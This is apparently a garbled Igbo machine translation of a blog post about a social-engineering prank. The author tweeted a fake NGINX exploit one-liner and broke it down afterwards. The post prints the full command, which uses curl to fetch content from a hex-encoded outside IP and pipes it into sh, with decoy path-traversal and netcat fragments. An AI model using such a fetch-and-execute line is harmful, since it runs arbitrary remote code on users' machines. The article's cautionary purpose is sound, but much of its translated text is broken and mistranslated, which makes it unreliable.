Ọganihu nke nnwale mmekọrịta mmadụ na iji nginx adịgboroja

Rịba ama. ntụgharị asụsụ.: na-ede akwụkwọ ndetu mbụ, nke e bipụtara na June 1, kpebiri ime nnwale n'etiti ndị nwere mmasị na nchekwa ozi. Iji mee nke a, ọ kwadebere nrigbu adịgboroja maka adịghị ike na-egosighi na sava weebụ wee biputere ya na Twitter ya. Echiche ya - ka ndị ọkachamara kpughee ozugbo bụ ndị ga-ahụ aghụghọ doro anya na koodu ahụ - ọ bụghị naanị na ha emezughị ... Ha gafere ihe niile a tụrụ anya ya, na n'akụkụ nke ọzọ: tweet nwetara nkwado dị ukwuu site n'aka ọtụtụ ndị na-emeghị. lelee ọdịnaya ya.

TL; DR: Ejila pipelining faịlụ na sh ma ọ bụ bash n'ọnọdụ ọ bụla. Nke a bụ ụzọ dị mma isi kwụsị njikwa kọmputa gị.

Achọrọ m ịkọrọ gị obere akụkọ gbasara nrigbu PoC na-atọ ọchị nke emere na Mee 31st. Ọ pụtara ozugbo na nzaghachi ozi sitere na Alisa Esage Shevchenko, otu Mbido Day Zero (ZDI), na ozi gbasara adịghị ike na NGINX na-eduga na RCE (mkpọmkpọ koodu) ga-apụta n'oge na-adịghị anya. Ebe ọ bụ na NGINX na-enye ike ọtụtụ weebụsaịtị, akụkọ ahụ ga-abụrịrị bọmbụ. Ma n'ihi igbu oge na usoro "nkpughe nke kwesịrị ekwesị", amabeghị nkọwa nke ihe merenụ - nke a bụ usoro ZDI ọkọlọtọ.

tweet gbasara nkwuputa adịghị ike na NGINX

Mgbe m rụchara ọrụ na usoro ihe mgbochi ọhụrụ na curl, ehotara m tweet mbụ wee “wepụta PoC na-arụ ọrụ” nke nwere otu ahịrị koodu nke chere na ọ na-erigbu adịghị ike achọpụtara. N'ezie, nke a bụ nzuzu zuru oke. Echere m na a ga-ekpughe m ozugbo, na na kacha mma m ga-enweta retweets abụọ (oh ọma).

tweet jiri adịgboroja erigbu

Otú ọ dị, apụghị m iche n'echiche ihe merenụ. Ihe ewu ewu tweet m rigoro elu. N'ụzọ dị ịtụnanya, n'oge a (15:00 Moscow oge June 1) mmadụ ole na ole achọpụtala na nke a bụ adịgboroja. Ọtụtụ ndị mmadụ na-atụgharị ya na-enweghị ịlele ya ma ọlị (ka naanị na-enwe mmasị na eserese ASCII mara mma ọ na-ewepụta).

Naanị lee ka ọ si maa mma!

Ọ bụ ezie na loops na agba ndị a niile dị mma, o doro anya na ndị mmadụ ga-agba ọsọ na igwe ha iji hụ ha. N'ụzọ dị mma, ihe nchọgharị na-arụ ọrụ n'otu ụzọ ahụ, yana n'eziokwu na achọghị m ịbanye na nsogbu iwu, koodu ahụ e liri na saịtị m na-eme oku oku oku na-achọghị ịwụnye ma ọ bụ mebie koodu ọzọ.

Obere mgbakasị ahụ: netspooky, dnz, mụ na ndị ọzọ si otu Ìgwè mmadụ Anyị ejirila ụzọ dị iche iche na-egwu egwu iji gbochie iwu curl nwa oge ugbu a n'ihi na ọ dị mma… na anyị bụ ndị geeks. netspooky na dnz achọpụtala ọtụtụ ụzọ ọhụrụ ndị yiri m ihe na-ekwe m nkwa. M sonyeere na ihe ọchị ahụ wee nwaa ịgbakwunye ntụgharị decimal IP na akpa aghụghọ. Ọ tụgharịrị na IP nwekwara ike ịtụgharị ka ọ bụrụ usoro hexadecimal. Ọzọkwa, curl na ọtụtụ ngwaọrụ NIX ndị ọzọ na-eji obi ụtọ na-eri hexadecimal IPs! Ya mere, ọ bụ naanị okwu ịmepụta ahịrị iwu na-ekwenye ekwenye na nke nwere nchebe. N'ikpeazụ m kwadoro na nke a:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE) - karịa naanị phishing

Nchekwa na ịmara bụ akụkụ bụ isi nke nnwale a. Echere m na ọ bụ ha mere ka ọ nwee ihe ịga nke ọma. Ahịrị iwu ahụ gosipụtara nchekwa nke ọma site n'ịtụ aka na "127.0.0.1" (onye obodo a ma ama). A na-ahụta Localhost dị ka nchekwa na data dị na ya anaghị ahapụ kọmputa gị.

Ọmụma bụ isi ihe nke abụọ SEE nke nnwale ahụ. Ebe ọ bụ na ndị na-ege ntị lekwasịrị anya bụ ndị maara nke ọma ihe ndabere nke nchekwa kọmputa, ọ dị mkpa ịmepụta koodu ka akụkụ ya wee yie ka ọ maara nke ọma na nke ọma (ya mere ọ dị nchebe). Ịgbazi ihe nke echiche erigbu ochie na ijikọta ha n'ụzọ pụrụ iche egosila na ọ na-aga nke ọma.

N'okpuru ebe a bụ nyocha zuru ezu nke otu-liner. Ihe niile dị na listi a na-eyi ọdịdị ịchọ mma, na ihe fọrọ nke nta ka ọ bụrụ ihe ọ bụla achọrọ maka ọrụ ya n'ezie.

Kedu ihe ndị dị mkpa n'ezie? Nke a -gsS, -O 0x0238f06a, |sh na sava weebụ n'onwe ya. Sava webụ enweghị ntụzịaka ọjọọ ọ bụla, kama ọ na-eje ozi naanị eserese ASCII site na iji iwu echo n'edemede dị n'ime ya index.html. Mgbe onye ọrụ tinyere akara ya |sh n'etiti, index.html kwajuru ma gbuo. Ọ dabara nke ọma, ndị na-elekọta sava weebụ enweghị ebumnuche ọjọọ.

• ../../../%00 - na-anọchi anya ịgafe ndekọ;
• ngx_stream_module.so - ụzọ na modul NGINX random;
• /bin/sh%00<'protocol:TCP' - A na-eche na anyị na-amalite /bin/sh na igwe ebumnuche ma redirect mmepụta na ọwa TCP;
• -O 0x0238f06a#PLToffset - ihe nzuzo, agbakwunyere #PLToffset, ka ọ dị ka nkwụsị ebe nchekwa n'ụzọ ụfọdụ dị na PLT;
• |sh; - ọzọ dị mkpa iberibe. Anyị kwesịrị ịtụgharị mmepụta na sh/bash iji mebie koodu na-abịa site na sava weebụ na-awakpo dị na 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - a dummy nke netcat na-ezo aka /dev/tcp/localhostka ihe niile wee dị mma ọzọ. N'ezie, ọ dịghị eme ihe ọ bụla ma tinye ya n'ahịrị maka ịma mma.

Nke a mechiri ngbanwe nke edemede otu ahịrị yana mkparịta ụka nke akụkụ nke "socio-electronic engineering" (phishing mgbagwoju anya).

Nhazi sava webụ na ihe mgbochi

Ebe ọ bụ na ọnụ ọgụgụ ka ukwuu nke ndị debanyere aha m bụ ndị infosec / hackers, ekpebiri m ime ka sava weebụ dị ntakịrị na-eguzogide okwu nke "mmasị" n'akụkụ ha, ka ụmụ okorobịa ahụ nwee ihe ha ga-eme (ọ ga-abụkwa ihe na-atọ ụtọ. melite). Agaghị m edepụta ọnyà niile ebe a ebe nnwale ahụ ka na-aga n'ihu, mana ebe a bụ ihe ole na ole sava ahụ na-eme:

• Na-enyocha mbọ ikesa nkesa na netwọkụ mmekọrịta yana dochie obere vidiyo nhụchalụ dị iche iche iji gbaa onye ọrụ ume ịpị njikọ ahụ.
• Na-atụgharị Chrome/Mozilla/Safari/etc gaa na vidiyo nkwado Thugcrowd kama igosi edemede shei.
• Na-ele anya maka akara ngosi doro anya nke mbanye / hacking doro anya, wee malite ibugharị arịrịọ na sava NSA (ha!).
• Wụnye Trojan, yana BIOS rootkit, na kọmpụta niile nke ndị ọrụ ha na-eleta onye ọbịa site na ihe nchọgharị mgbe niile (na-egwu egwu!).

Obere akụkụ nke antimers

N'okwu a, naanị ihe mgbaru ọsọ m bụ ịmụta ụfọdụ njirimara Apache - karịsịa, iwu dị mma maka redirecting arịrịọ - ma echere m: gịnị kpatara ya?

NGINX irigbu (Ezigbo!)

Idenye aha na @alisaesage na Twitter ma soro nnukwu ọrụ ZDI n'ịgbasa ezigbo adịghị ike na iji ohere dị na NGINX. Ọrụ ha na-amasị m mgbe niile, ana m ekele Alice maka ndidi ya na nkwupụta na ọkwa niile tweet nzuzu m kpatara. Ọ dabara nke ọma, o mekwara ụfọdụ ihe ọma: o nyere aka mee ka mmadụ mata adịghị ike nke NGINX, yana nsogbu ndị sitere n'iji curl eme ihe.

isi: www.habr.com